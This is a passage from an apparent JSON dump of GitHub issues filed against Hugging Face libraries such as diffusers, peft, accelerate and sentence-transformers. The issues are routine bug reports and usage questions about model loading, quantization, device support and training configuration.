Qwen2RotaryEmbedding()\r\n )\r\n (score): Linear(in_features=1536, out_features=1, bias=False)\r\n )\r\n )\r\n)\r\nHello, the above is my model structure. 
In short, I use a custom LLMDecoder, which has a variable named model which is a Qwen2ForSequenceClassification object.\r\nIn this case, how should I save the model in deepspeed zero3?\r\n\r\nThe following code is not suitable for my model structure, how should I modify it?\r\n\r\n\r\nunwrapped_model = accelerator.unwrap_model(model)\r\nunwrapped_model.save_pretrained(\r\n args.output_dir,\r\n is_main_process=accelerator.is_main_process,\r\n save_function=accelerator.save,\r\n state_dict=accelerator.get_state_dict(model),\r\n)", "url": "https://github.com/huggingface/accelerate/issues/3309", "state": "closed", "labels": [], "created_at": "2024-12-21T17:01:17Z", "updated_at": "2025-01-30T15:06:45Z", "user": "NLPJCL" }, { "repo": "huggingface/diffusers", "number": 10334, "title": "Sana broke on MacOS. Grey images on MPS, NaN's on CPU.", "body": "### Describe the bug\n\nJust started to play with Sana, was excited when I saw it was coming to Diffusers as the NVIDIA supplied code was full of CUDA only stuff.\r\nRan the example code, changing cuda to mps and got a grey image.\r\n\r\n![output](https://github.com/user-attachments/assets/f8f230d2-c025-437a-adf4-9bbb76767a65)\r\n\r\nRemoved the move to MPS to run it on the CPU and the script failed with\r\n```\r\nimage_processor.py:147: RuntimeWarning: invalid value encountered in cast\r\n``` \r\nthat suggests the latents had NaN's on the CPU.\n\n### Reproduction\n\n```py\r\nimport torch\r\nfrom diffusers import SanaPipeline\r\n\r\npipe = SanaPipeline.from_pretrained(\r\n \"Efficient-Large-Model/Sana_1600M_1024px_diffusers\", torch_dtype=torch.float32\r\n)\r\npipe.to(\"mps\")\r\npipe.text_encoder.to(torch.bfloat16)\r\npipe.transformer = pipe.transformer.to(torch.float16)\r\n\r\nimage = pipe(prompt='a cyberpunk cat with a neon sign that says \"Sana\"')[0]\r\nimage[0].save(\"output.png\")\r\n```\r\n\r\nremoved `pipe.to(\"mps\")` to run on the CPU.\n\n### Logs\n\n```shell\n*** MPS run ***\r\n(Diffusers) $ python sana_test.py\r\nLoading checkpoint shards: 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 2/2 [00:10<00:00, 5.03s/it]\r\nLoading pipeline components...: 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 5/5 [00:10<00:00, 2.18s/it]\r\n\r\nSetting `clean_caption=True` requires the Beautiful Soup library but it was not found in your environment. You can install it with pip:\r\n`pip install beautifulsoup4`. Please note that you may need to restart your runtime after installation.\r\n\r\nSetting `clean_caption` to False...\r\nThe 'batch_size' argument of HybridCache is deprecated and will be removed in v4.49. Use the more precisely named 'max_batch_size' argument instead.\r\nThe 'batch_size' attribute of HybridCache is deprecated and will be removed in v4.49. Use the more precisely named 'self.max_batch_size' attribute instead.\r\n\r\nSetting `clean_caption=True` requires the Beautiful Soup library but it was not found in your environment. 
You can install it with pip:\r\n`pip install beautifulsoup4`. Please note that you may need to restart your runtime after installation.\r\n\r\nSetting `clean_caption` to False...\r\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 20/20 [00:49<00:00, 2.48s/it]\r\n(Diffusers) $ \r\n\r\n***CPU run***\r\n\r\n(Diffusers) $ python sana_test.py\r\nLoading checkpoint shards: 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 2/2 [00:06<00:00, 3.13s/it]\r\nLoading pipeline components...: 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 5/5 [00:07<00:00, 1.41s/it]\r\n\r\nSetting `clean_caption=True` requires the Beautiful Soup library but it was not found in your environment. You can install it with pip:\r\n`pip install beautifulsoup4`. Please note that you may need to restart your runtime after installation.\r\n\r\nSetting `clean_caption` to False...\r\nThe 'batch_size' argument of HybridCache is deprecated and will be removed in v4.49. Use the more precisely named 'max_batch_size' argument instead.\r\nThe 'batch_size' attribute of HybridCache is deprecated and will be removed in v4.49. Use the more precisely named 'self.max_batch_size' attribute instead.\r\n\r\nSetting `clean_caption=True` requires the Beautiful Soup library but it was not found in your environment. You can install it with pip:\r\n`pip install beautifulsoup4`. 
Please note that you may need to restart your runtime after installation.\r\n\r\nSetting `clean_caption` to False...\r\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 20/20 [20:14<00:00, 60.74s/it]\r\n/Volumes/SSD2TB/AI/Diffusers/lib/python3.11/site-packages/diffusers/image_processor.py:147: RuntimeWarning: invalid value encountered in cast\r\n images = (images * 255).round().astype(\"uint8\")\r\n(Diffusers) $\n```\n\n\n### System Info\n\n- \ud83e\udd17 Diffusers version: 0.32.0.dev0\r\n- Platform: macOS-15.2-arm64-arm-64bit\r\n- Running on Google Colab?: No\r\n- Python version: 3.11.10\r\n- PyTorch version (GPU?): 2.6.0.dev20241219 (False)\r\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\r\n- Jax version: not installed\r\n- JaxLib version: not installed\r\n- Huggingface_hub version: 0.25.0\r\n- Transformers version: 4.47.1\r\n- Accelerate version: 0.34.2\r\n- PEFT version: not installed\r\n- Bitsandbytes version: not installed\r\n- Safetensors version: 0.4.5\r\n- xFormers version: not installed\r\n- Accelerator: Apple M3\r\n- Using GPU in script?: both\r\n- Using distributed or parallel set-up in script?: no\n\n### Who can help?\n\n@pcuenca", "url": "https://github.com/huggingface/diffusers/issues/10334", "state": "closed", "labels": [ "bug", "stale" ], "created_at": "2024-12-21T11:26:40Z", "updated_at": "2025-01-27T01:26:43Z", "comments": 8, "user": "Vargol" }, { "repo": "huggingface/peft", "number": 2292, "title": "Cannot import name 'EncoderDecoderCache' from 'transformers'", "body": "### System Info\n\ntransformer==4.39.3;peft==0.14.0\r\n\r\n\r\n\r\nMaybe this is from transformer's update,so which version can i use. 
\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nfrom src import models\r\nfrom src.utils import IImage, resize\r\nimport numpy as np\r\nfrom src.methods import rasg, sd, sr\r\nfrom PIL import Image\r\nfrom peft import get_peft_model, LoraConfig, TaskType\r\ninp_model = models.load_inpainting_model('ds8_inp', device='cpu', cache=True)\r\nlora_config = LoraConfig(\r\n task_type=TaskType.IMAGE_GENERATION,\r\n inference_mode=True,\r\n r=8,\r\n lora_alpha=16,\r\n lora_dropout=0.05,\r\n)\r\nnew_model = get_peft_model(inp_model.unet, lora_config)\r\nprint(new_model.state_dict().keys())\r\n\n\n### Expected behavior\n\n/root/miniconda3/lib/python3.10/site-packages/timm/models/layers/__init__.py:48: FutureWarning: Importing from timm.models.layers is deprecated, please import via timm.layers\r\n warnings.warn(f\"Importing from {__name__} is deprecated, please import via timm.layers\", FutureWarning)\r\nTraceback (most recent call last):\r\n File \"/root/autodl-tmp/workspace/HD-Painter/paratest.py\", line 6, in \r\n from peft import get_peft_model, LoraConfig, TaskType\r\n File \"/root/miniconda3/lib/python3.10/site-packages/peft/__init__.py\", line 22, in \r\n from .auto import (\r\n File \"/root/miniconda3/lib/python3.10/site-packages/peft/auto.py\", line 32, in \r\n from .mapping import MODEL_TYPE_TO_PEFT_MODEL_MAPPING\r\n File \"/root/miniconda3/lib/python3.10/site-packages/peft/mapping.py\", line 25, in \r\n from .mixed_model import PeftMixedModel\r\n File \"/root/miniconda3/lib/python3.10/site-packages/peft/mixed_model.py\", line 29, in \r\n from .peft_model import PeftModel\r\n File \"/root/miniconda3/lib/python3.10/site-packages/peft/peft_model.py\", line 37, in \r\n from transformers import Cache, DynamicCache, EncoderDecoderCache, PreTrainedModel\r\nImportError: cannot import name 'Cache' from 'transformers' (/root/miniconda3/lib/python3.10/site-packages/transformers/__init__.py)", "url": "https://github.com/huggingface/peft/issues/2292", "state": "closed", "labels": [], "created_at": "2024-12-21T09:00:04Z", "updated_at": "2025-03-31T06:50:20Z", "comments": 4, "user": "Huang-jia-xuan" }, { "repo": "huggingface/sentence-transformers", "number": 3141, "title": "How to load ModernBERT model correctly?", "body": "Hi Teams,\r\n\r\nI want to ask how to properly load [ModernBERT](https://huggingface.co/blog/modernbert) using SentenceTransformer?\r\n\r\nThe main difficulty I met is about the weight loading of prediction head as defined [here](https://github.com/huggingface/transformers/blob/f42084e6411c39b74309af4a7d6ed640c01a4c9e/src/transformers/models/modernbert/modeling_modernbert.py#L1121-L1123) where `ModernBertPredictionHead` is not included in the `AutoModelClass`. 
I tried to use the following code:\r\n```python\r\nimport torch\r\nfrom sentence_transformers import SentenceTransformer,models\r\nmodel_name_or_path = \"answerdotai/ModernBERT-base\"\r\nmodules = []\r\nmodules.append(models.Transformer(model_name_or_path))\r\n\r\n## head\r\nmodules.append(models.Dense(768,768,activation_function=torch.nn.GELU()))\r\nmodules.append(models.Dense(768,768,activation_function=torch.nn.Identity()))\r\n\r\n## pooling\r\nmodules.append(models.Pooling(768,pooling_mode=\"mean\"))\r\n\r\n## classifier\r\nmodules.append(models.Dense(768,1))\r\n\r\nmodel = SentenceTransformer(modules=modules,device=\"cpu\")\r\n```\r\n\r\nHowever, it seems that `Dense` before `Pooling` is not supported and would throw an error:\r\n```\r\nKeyError: 'sentence_embedding'\r\n```", "url": "https://github.com/huggingface/sentence-transformers/issues/3141", "state": "closed", "labels": [], "created_at": "2024-12-20T06:52:44Z", "updated_at": "2024-12-24T03:08:47Z", "user": "Hannibal046" }, { "repo": "huggingface/picotron", "number": 15, "title": "Difference between picotron and nanotron", "body": "What is the difference between picotron and [nanotron](https://github.com/huggingface/nanotron)? Why huggingface team rolled out two hybrid-parallelism framework?", "url": "https://github.com/huggingface/picotron/issues/15", "state": "closed", "labels": [ "question" ], "created_at": "2024-12-19T12:48:57Z", "updated_at": "2024-12-20T10:17:25Z", "user": "cailun01" }, { "repo": "huggingface/diffusers", "number": 10302, "title": "Using FP8 for inference without CPU offloading can introduce noise.", "body": "### Describe the bug\r\n\r\nIf I use ```pipe.enable_model_cpu_offload(device=device)```, the model can perform inference correctly after warming up. However, if I comment out this line, the inference results are noisy.\r\n\r\n### Reproduction\r\n\r\n```python\r\nfrom diffusers import (\r\n FluxPipeline, \r\n FluxTransformer2DModel\r\n)\r\nfrom transformers import T5EncoderModel, CLIPTextModel,CLIPTokenizer,T5TokenizerFast\r\nfrom optimum.quanto import freeze, qfloat8, quantize\r\nimport torch\r\nfrom diffusers import FlowMatchEulerDiscreteScheduler, AutoencoderKL\r\ndtype = torch.bfloat16\r\nbfl_repo = f\"black-forest-labs/FLUX.1-dev\" \r\ndevice = \"cuda\"\r\nscheduler = FlowMatchEulerDiscreteScheduler.from_pretrained(bfl_repo, subfolder=\"scheduler\", torch_dtype=dtype)\r\ntext_encoder = CLIPTextModel.from_pretrained(bfl_repo, subfolder=\"text_encoder\", torch_dtype=dtype)\r\ntokenizer = CLIPTokenizer.from_pretrained(bfl_repo, subfolder=\"tokenizer\", torch_dtype=dtype, clean_up_tokenization_spaces=True)\r\ntext_encoder_2 = T5EncoderModel.from_pretrained(bfl_repo, subfolder=\"text_encoder_2\", torch_dtype=dtype)\r\ntokenizer_2 = T5TokenizerFast.from_pretrained(bfl_repo, subfolder=\"tokenizer_2\", torch_dtype=dtype, clean_up_tokenization_spaces=True)\r\nvae = AutoencoderKL.from_pretrained(bfl_repo, subfolder=\"vae\", torch_dtype=dtype)\r\n\r\ntransformer = FluxTransformer2DModel.from_single_file(\"https://huggingface.co/Kijai/flux-fp8/blob/main/flux1-dev-fp8.safetensors\", torch_dtype=dtype)\r\nquantize(transformer, weights=qfloat8)\r\nfreeze(transformer)\r\nquantize(text_encoder_2, weights=qfloat8)\r\nfreeze(text_encoder_2)\r\n\r\npipe = FluxPipeline(\r\n scheduler=scheduler,\r\n text_encoder=text_encoder,\r\n tokenizer=tokenizer,\r\n text_encoder_2=text_encoder_2,\r\n tokenizer_2=tokenizer_2,\r\n vae=vae,\r\n transformer=transformer\r\n ).to(device, dtype=dtype) # edit\r\n\r\n# 
pipe.enable_model_cpu_offload(device=device) \r\nparams = {\r\n \"prompt\": \"a cat\",\r\n \"num_images_per_prompt\": 1,\r\n \"num_inference_steps\":1,\r\n \"width\": 64,\r\n \"height\": 64,\r\n \"guidance_scale\": 7,\r\n }\r\nimage = pipe(**params).images[0] # wamup\r\nparams = {\r\n \"prompt\": \"a cat\",\r\n \"num_images_per_prompt\": 1,\r\n \"num_inference_steps\":25,\r\n \"width\": 512,\r\n \"height\": 512,\r\n \"guidance_scale\": 7,\r\n }\r\nimage = pipe(**params).images[0] \r\nimage.save(\"1.jpg\")\r\n```\r\n\r\n### Logs\r\n\r\n_No response_\r\n\r\n### System Info\r\n\r\nWARNING[XFORMERS]: xFormers can't load C++/CUDA extensions. xFormers was built for:\r\n PyTorch 2.5.1+cu121 with CUDA 1201 (you have 2.4.1+cu121)\r\n Python 3.10.15 (you have 3.10.13)\r\n Please reinstall xformers (see https://github.com/facebookresearch/xformers#installing-xformers)\r\n Memory-efficient attention, SwiGLU, sparse and more won't be available.\r\n Set XFORMERS_MORE_DETAILS=1 for more details\r\n\r\nCopy-and-paste the text below in your GitHub issue and FILL OUT the two last points.\r\n\r\n- \ud83e\udd17 Diffusers version: 0.32.0.dev0\r\n- Platform: Linux-6.8.0-49-generic-x86_64-with-glibc2.35\r\n- Running on Google Colab?: No\r\n- Python version: 3.10.13\r\n- PyTorch version (GPU?): 2.4.1+cu121 (True)\r\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\r\n- Jax version: not installed\r\n- JaxLib version: not installed\r\n- Huggingface_hub version: 0.26.2\r\n- Transformers version: 4.46.2\r\n- Accelerate version: 0.31.0\r\n- PEFT version: 0.14.0\r\n- Bitsandbytes version: not installed\r\n- Safetensors version: 0.4.3\r\n- xFormers version: 0.0.28.post3\r\n- Accelerator: NVIDIA GeForce RTX 3090, 24576 MiB\r\nNVIDIA GeForce RTX 3090, 24576 MiB\r\n- Using GPU in script?: \r\n- Using distributed or parallel set-up in script?: \r\n\r\n### Who can help?\r\n\r\n@yiyixuxu @DN6", "url": "https://github.com/huggingface/diffusers/issues/10302", "state": "open", "labels": [ "bug" ], "created_at": "2024-12-19T12:39:06Z", "updated_at": "2025-03-10T14:18:58Z", "comments": 6, "user": "todochenxi" }, { "repo": "huggingface/candle", "number": 2674, "title": "[Question] How to create a autograd function like in PyTorch? How to customize forward and backward process?", "body": "", "url": "https://github.com/huggingface/candle/issues/2674", "state": "open", "labels": [], "created_at": "2024-12-19T07:02:04Z", "updated_at": "2024-12-19T07:02:15Z", "user": "VanderBieu" }, { "repo": "huggingface/blog", "number": 2551, "title": "How to process and visualize the segment output tokens?", "body": "How to process the segment tokens and generate segmentation masks? what the output means?\r\n![\u5fae\u4fe1\u56fe\u7247_20241219110946](https://github.com/user-attachments/assets/089e5d16-f133-449a-a0ee-0f7c07e335dc)\r\n", "url": "https://github.com/huggingface/blog/issues/2551", "state": "open", "labels": [], "created_at": "2024-12-19T03:11:15Z", "updated_at": "2024-12-19T03:11:15Z", "user": "00mmw" }, { "repo": "huggingface/transformers", "number": 35316, "title": "How to use a custom Image Processor?", "body": "I want to use the processor in the form of `auto_map` but when using `AutoProcessor.from_pretrained`, I am unable to load the custom `ImageProcessor`.\r\n\r\nThe root cause lies in the use of the `transformers_module` to initialize the class in `ProcessorMixin`. 
\r\n\r\nhttps://github.com/huggingface/transformers/blob/c7e48053aab09ad11efa2ad12513e9ab56f29563/src/transformers/processing_utils.py#L1018\r\n\r\nEven though I have overridden the _get_arguments_from_pretrained method, this issue still exists in the `__init__`. \r\n\r\nhttps://github.com/huggingface/transformers/blob/c7e48053aab09ad11efa2ad12513e9ab56f29563/src/transformers/processing_utils.py#L383\r\n\r\nPerhaps I could avoid inheriting from ProcessorMixin, but I would like to know if there is a more elegant way to achieve this functionality?", "url": "https://github.com/huggingface/transformers/issues/35316", "state": "closed", "labels": [], "created_at": "2024-12-18T12:04:33Z", "updated_at": "2024-12-19T02:53:43Z", "user": "glamourzc" }, { "repo": "huggingface/diffusers", "number": 10281, "title": "Request to implement FreeScale, a new diffusion scheduler", "body": "### Model/Pipeline/Scheduler description\r\n\r\nFreeScale is a tuning-free method for higher-resolution visual generation, unlocking 8K image generation for pre-trained SDXL! Compared to direct inference by SDXL, FreeScale brings negligible additional memory and time costs.\r\n\r\n![fig_teaser](https://github.com/user-attachments/assets/3eef38cc-3642-42a7-b5e7-8b32c32ecc77)\r\n\r\n![fig_diff8k](https://github.com/user-attachments/assets/8cec7c55-011e-4434-81e3-1e80dd5dd003)\r\n\r\n### Open source status\r\n\r\n- [X] The model implementation is available.\r\n- [X] The model weights are available (Only relevant if addition is not a scheduler).\r\n\r\n### Provide useful links for the implementation\r\n\r\n- Project: http://haonanqiu.com/projects/FreeScale.html\r\n- Paper: https://arxiv.org/abs/2412.09626\r\n- Code: https://github.com/ali-vilab/FreeScale\r\n- Hugging Face Demo: https://huggingface.co/spaces/MoonQiu/FreeScale\r\n\r\nThe code changes of FreeScale are not complicated, but I do not know how to integrate them into diffusers smoothly. If you have questions about FreeScale, please ask me (@arthur-qiu).", "url": "https://github.com/huggingface/diffusers/issues/10281", "state": "open", "labels": [ "stale", "consider-for-modular-diffusers" ], "created_at": "2024-12-18T06:32:34Z", "updated_at": "2025-01-17T15:02:49Z", "comments": 1, "user": "arthur-qiu" }, { "repo": "huggingface/diffusers", "number": 10280, "title": "Safetensors loading uses mmap with multiple processes sharing the same fd, causing slow gcsfuse performance", "body": "### Describe the bug\r\n\r\nWhen I use `StableDiffusionPipeline.from_single_file` to load a safetensors model, I noticed that the loading speed is extremely slow when the file is loaded from GCSFuse (https://cloud.google.com/storage/docs/cloud-storage-fuse/overview).\r\n\r\nThe reason is that the loader creates multiple processes but they all share the same fd and its file handle. As each process reads a different offset of the file, it makes GCSFuse perform really badly, because those reads appear to be random reads jumping between offsets. For example:\r\n\r\n```\r\nconnection.go:420] <- ReadFile (inode 2, PID 77, handle 1, offset 529453056, 262144 bytes)\r\nconnection.go:420] <- ReadFile (inode 2, PID 78, handle 1, offset 531812352, 262144 bytes)\r\nconnection.go:420] <- ReadFile (inode 2, PID 79, handle 1, offset 534171648, 262144 bytes)\r\nconnection.go:420] <- ReadFile (inode 2, PID 50, handle 1, offset 527351808, 4096 bytes)\r\n```\r\n\r\nThe question I have is why the loader's multiple processes share the same fd in the first place?
As `mmap` is already used, even if the multiple processes don't share the same fd, the kernel will still map the virtual memory for each process back to the same page cache naturally, so there is no need to share the fd across the processes.\r\n\r\nIf they don't share the fd, GCSFuse will perform much better. Therefore, can we disable the fd sharing?\r\n\r\n### Reproduction\r\n\r\nSimply using GCSFuse to serve a file to `StableDiffusionPipeline.from_single_file`\r\n\r\n### Logs\r\n\r\n_No response_\r\n\r\n### System Info\r\n\r\nN/A\r\n\r\n### Who can help?\r\n\r\n@yiyixuxu @asomoza ", "url": "https://github.com/huggingface/diffusers/issues/10280", "state": "closed", "labels": [ "bug" ], "created_at": "2024-12-18T06:02:41Z", "updated_at": "2025-01-10T10:11:05Z", "comments": 4, "user": "wlhee" }, { "repo": "huggingface/optimum-neuron", "number": 750, "title": "Document how to use Qwen 2.5", "body": "### Feature request\n\nQwen 2.5 7B Instruct on EC2 with the HF DL AMI\r\nQwen 2.5 7B Instruct on SageMaker with the HF DLC Neuronx TGI\r\nMaybe something for the code version too? \r\nDependency: adding the model to the cache\n\n### Motivation\n\nIncrease AMI and DLC usage\n\n### Your contribution\n\ndoc", "url": "https://github.com/huggingface/optimum-neuron/issues/750", "state": "closed", "labels": [ "Stale" ], "created_at": "2024-12-17T16:03:25Z", "updated_at": "2025-01-22T08:04:54Z", "user": "pagezyhf" }, { "repo": "huggingface/accelerate", "number": 3294, "title": "How to run accelerate with PYTORCH_ENABLE_MPS_FALLBACK", "body": "### System Info\n\n```Shell\nMacOS \r\n\r\ntransformers>=4.35.1\r\ndatasets[audio]>=2.14.7\r\naccelerate>=0.24.1\r\nmatplotlib\r\nwandb\r\ntensorboard\r\nCython\r\n\r\n- `Accelerate` version: 1.2.1\r\n- Platform: macOS-14.7.1-arm64-arm-64bit\r\n- `accelerate` bash location: .venv/bin/accelerate\r\n- Python version: 3.12.3\r\n- Numpy version: 2.0.2\r\n- PyTorch version (GPU?): 2.5.1 (False)\r\n- PyTorch XPU available: False\r\n- PyTorch NPU available: False\r\n- PyTorch MLU available: False\r\n- PyTorch MUSA available: False\r\n- System RAM: 64.00 GB\r\n- `Accelerate` default config:\r\n\tNot found\n```\n\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] One of the scripts in the examples/ folder of Accelerate or an officially supported `no_trainer` script in the `examples` folder of the `transformers` repo (such as `run_no_trainer_glue.py`)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nHow do I set the `PYTORCH_ENABLE_MPS_FALLBACK` environment variable when running a script with accelerate? Accelerate is not picking up the PYTORCH_ENABLE_MPS_FALLBACK environment variable when running a script, no matter where this variable is set. I tried to set this variable in the script, on the command line and in the `./zshenv`, and still PyTorch is complaining that it does not see this variable.\n\n### Expected behavior\n\nExpected the PYTORCH_ENABLE_MPS_FALLBACK variable to be visible in the sub-process/thread.", "url": "https://github.com/huggingface/accelerate/issues/3294", "state": "closed", "labels": [], "created_at": "2024-12-15T07:03:41Z", "updated_at": "2025-01-23T15:06:57Z", "user": "mirodil-ml" }, { "repo": "huggingface/diffusers", "number": 10223, "title": "Where should I obtain the lora-sdxl-dreambooth-id in Inference", "body": "### Describe the bug\n\nI tried to upload the download link from the README file generated during training, but an error indicated it was incorrect.
Where should I obtain the lora-id for Inference?\n\n### Reproduction\n\nREADME.md:\r\n---\r\nbase_model: /data/ziqiang/czc/diffusers/examples/dreambooth/model\r\nlibrary_name: diffusers\r\nlicense: openrail++\r\ninstance_prompt: a photo of sks dog\r\nwidget: []\r\ntags:\r\n- text-to-image\r\n- text-to-image\r\n- diffusers-training\r\n- diffusers\r\n- lora\r\n- template:sd-lora\r\n- stable-diffusion-xl\r\n- stable-diffusion-xl-diffusers\r\n---\r\n\r\n\r\n\r\n\r\n# SDXL LoRA DreamBooth - daniu111/output\r\n\r\n\r\n\r\n## Model description\r\n\r\nThese are daniu111/output LoRA adaption weights for /data/ziqiang/czc/diffusers/examples/dreambooth/model.\r\n\r\nThe weights were trained using [DreamBooth](https://dreambooth.github.io/).\r\n\r\nLoRA for the text encoder was enabled: False.\r\n\r\nSpecial VAE used for training: /data/ziqiang/czc/diffusers/examples/dreambooth/model/vae.\r\n\r\n## Trigger words\r\n\r\nYou should use a photo of sks dog to trigger the image generation.\r\n\r\n## Download model\r\n\r\nWeights for this model are available in Safetensors format.\r\n\r\n[Download](daniu111/output/tree/main) them in the Files & versions tab.\r\n\r\n\r\n\r\n## Intended uses & limitations\r\n\r\n#### How to use\r\n\r\n```python\r\n# TODO: add an example code snippet for running this diffusion pipeline\r\n```\r\n\r\n#### Limitations and bias\r\n\r\n[TODO: provide examples of latent issues and potential remediations]\r\n\r\n## Training details\r\n\r\n[TODO: describe the data used to train the model]\r\n\r\n\r\nInference:\r\nfrom huggingface_hub.repocard import RepoCard\r\nfrom diffusers import DiffusionPipeline\r\nimport torch\r\n\r\nlora_model_id = <\"lora-sdxl-dreambooth-id\">\r\ncard = RepoCard.load(lora_model_id)\r\nbase_model_id = card.data.to_dict()[\"base_model\"]\r\n\r\npipe = DiffusionPipeline.from_pretrained(base_model_id, torch_dtype=torch.float16)\r\npipe = pipe.to(\"cuda\")\r\npipe.load_lora_weights(lora_model_id)\r\nimage = pipe(\"A picture of a sks dog in a bucket\", num_inference_steps=25).images[0]\r\nimage.save(\"sks_dog.png\")\r\n\r\n\"The lora-dreambooth-sdxl-id seems to need to be uploaded, but I don't know where to obtain this ID.\"\n\n### Logs\n\n_No response_\n\n### System Info\n\n- \ud83e\udd17 Diffusers version: 0.32.0.dev0\r\n- Platform: Linux-5.4.0-198-generic-x86_64-with-glibc2.31\r\n- Running on Google Colab?: No\r\n- Python version: 3.12.4\r\n- PyTorch version (GPU?): 2.4.0 (True)\r\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\r\n- Jax version: not installed\r\n- JaxLib version: not installed\r\n- Huggingface_hub version: 0.26.2\r\n- Transformers version: 4.46.3\r\n- Accelerate version: 1.1.1\r\n- PEFT version: 0.7.0\r\n- Bitsandbytes version: not installed\r\n- Safetensors version: 0.4.5\r\n- xFormers version: 0.0.27.post2\r\n- Accelerator: NVIDIA RTX A6000, 49140 MiB\r\nNVIDIA RTX A6000, 49140 MiB\r\nNVIDIA RTX A6000, 49140 MiB\r\n- Using GPU in script?: \r\n- Using distributed or parallel set-up in script?: \n\n### Who can help?\n\n@hlky ", "url": "https://github.com/huggingface/diffusers/issues/10223", "state": "open", "labels": [ "bug", "stale" ], "created_at": "2024-12-14T06:34:56Z", "updated_at": "2025-02-07T15:03:24Z", "comments": 5, "user": "Zarato2122" }, { "repo": "huggingface/lerobot", "number": 575, "title": "Gello dataset converter", "body": "I made a converter for the [Gello](https://wuphilipp.github.io/gello_site/) dataset format (pickles containing dicts with all the observations). 
\r\n\r\nIf this is of interest, I am willing to contribute it back here. \r\n\r\nThe current code can be found [here](https://github.com/tlpss/lerobot/blob/tlpss-dev/lerobot/common/datasets/push_dataset_to_hub/gello_pkl_format.py). It needs some cleanup, and maybe a convenient way to specify the mapping of dict keys in case you have a different number of cameras or other sensors. I wanted to see if there is any interest in this before I make the effort to clean it up.", "url": "https://github.com/huggingface/lerobot/issues/575", "state": "closed", "labels": [ "enhancement", "question", "dataset", "stale" ], "created_at": "2024-12-13T15:47:58Z", "updated_at": "2025-10-08T08:50:40Z", "user": "tlpss" }, { "repo": "huggingface/diffusers", "number": 10207, "title": "KolorsPipeline does not support from_single_file", "body": "```python\r\nfrom diffusers import KolorsPipeline\r\nKolorsPipeline.from_single_file(\"models/kolrs-8steps.safetensors\")\r\n```\r\n\r\nHow does KolorsPipeline load a single-file model?", "url": "https://github.com/huggingface/diffusers/issues/10207", "state": "open", "labels": [ "stale", "single_file" ], "created_at": "2024-12-13T09:44:46Z", "updated_at": "2025-01-12T15:02:46Z", "comments": 3, "user": "Thekey756" }, { "repo": "huggingface/sentence-transformers", "number": 3134, "title": "How to set a proper batch size when using CachedMultipleNegativesRankingLoss?", "body": "When using the [MultipleNegativesRankingLoss](https://sbert.net/docs/package_reference/sentence_transformer/losses.html#multiplenegativesrankingloss), I tried different batch size (per_device_train_batch_size) settings and found that 512 was the maximum. When the batch size was greater than 512, a GPU memory OOM happened.\r\n\r\nAs stated in the documentation of [CachedMultipleNegativesRankingLoss](https://sbert.net/docs/package_reference/sentence_transformer/losses.html#cachedmultiplenegativesrankingloss):\r\n\r\n> GradCache is a smart way to solve this problem. It achieves the goal by dividing the computation into two stages of embedding and loss calculation, which both can be scaled by mini-batches. As a result, memory of constant size (e.g. that works with batch size = 32) can now process much larger batches (e.g. 65536).\r\n\r\nSo, I tried 